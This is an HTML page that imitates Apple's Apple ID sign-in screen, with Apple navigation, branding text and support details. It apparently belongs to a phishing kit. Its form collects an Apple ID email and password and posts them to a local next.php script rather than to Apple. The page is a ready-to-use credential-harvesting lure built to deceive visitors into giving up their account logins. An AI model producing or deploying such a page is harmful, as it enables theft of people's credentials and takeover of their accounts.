<html>
<head>
<title></title>
<link rel="stylesheet" href="style/style.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<header>
<nav class="nav">
<table>
<tr>
<td><img class="appl"src="gbr/apple.jpg"></td>
<td>Mac</td>
<td>iPad</td>
<td>iPhone</td>
<td>Watch</td>
<td>TV</td>
<td>Music</td>
<td>Support</td>
<td><img class="appl" src="gbr/search.jpg"></td>
<!--<td><img class="appl"src="gbr/tas.jpg"></td>-->
<tr>
</table>
</nav>
</header>
<main>
<article class="pls"><b>Please sign in</b>.</article>

<form action="next.php"method="post">
<input required placeholder="Apple ID*" type="email" name="username">
<input required placeholder="Password*" type="password" name="password">
<br>
<article class="you">
Your Apple ID is the email address you use to sign in to iTunes,
the<br> App Store, and iCloud
</article>
<button class="btn"name="submit" type="submit">
Sign in
</button>
</form>
<article class="for">
Forgot your Apple ID or password?
</article>
<article class="for">
Don't have an Apple ID? Create one now.
</article>
</main>
<footer>
<hr class="hr">
<article class="ne">
Need more help? <span class="ch">Chat now</span> or call 1-800-MY-APPLE.
</article>
</footer>
</body>
</html>